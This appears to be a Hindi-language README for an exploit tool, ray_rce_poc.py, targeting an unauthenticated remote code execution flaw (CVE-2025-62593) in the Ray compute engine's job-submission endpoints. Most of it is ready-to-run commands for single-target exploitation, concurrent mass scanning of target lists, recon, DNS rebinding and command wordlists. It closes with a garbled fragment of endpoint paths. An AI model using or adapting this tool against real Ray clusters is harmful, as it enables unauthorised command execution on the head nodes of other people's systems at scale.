
CVE-2025-62593 — Ray Unauthenticated RCE Exploit एक Ray वितरित AI कंप्यूट इंजन में एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है।
CVE-2025-62593 Ray वितरित AI कंप्यूट इंजन में एक अनधिकृत रिमोट कोड निष्पादन भेद्यता है। मूल कारण महत्वपूर्ण HTTP एंडपॉइंट्स (/api/jobs, /api/job_agent/jobs) पर प्रमाणीकरण की अनुपस्थिति है। एक हमलावर एक Ray Job सबमिट कर सकता है जिसका entrypoint एक मनमाना कमांड है, और इसे क्लस्टर हेड नोड पर निष्पादित कर सकता है।
# एकल लक्ष्य
python3 ray_rce_poc.py --target http://HOST:8265
# बड़े पैमाने पर स्कैन (10 समवर्ती)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Recon मोड (त्वरित गणना)
python3 ray_rce_poc.py --recon --targets list.txt
# DNS रीबाइंडिंग मोड
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# वर्डलिस्ट स्कैन
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs//api/jobs/ जब तक जॉब टर्मिनल स्थिति तक नहीं पहुँचता/api/jobs/{id}/logs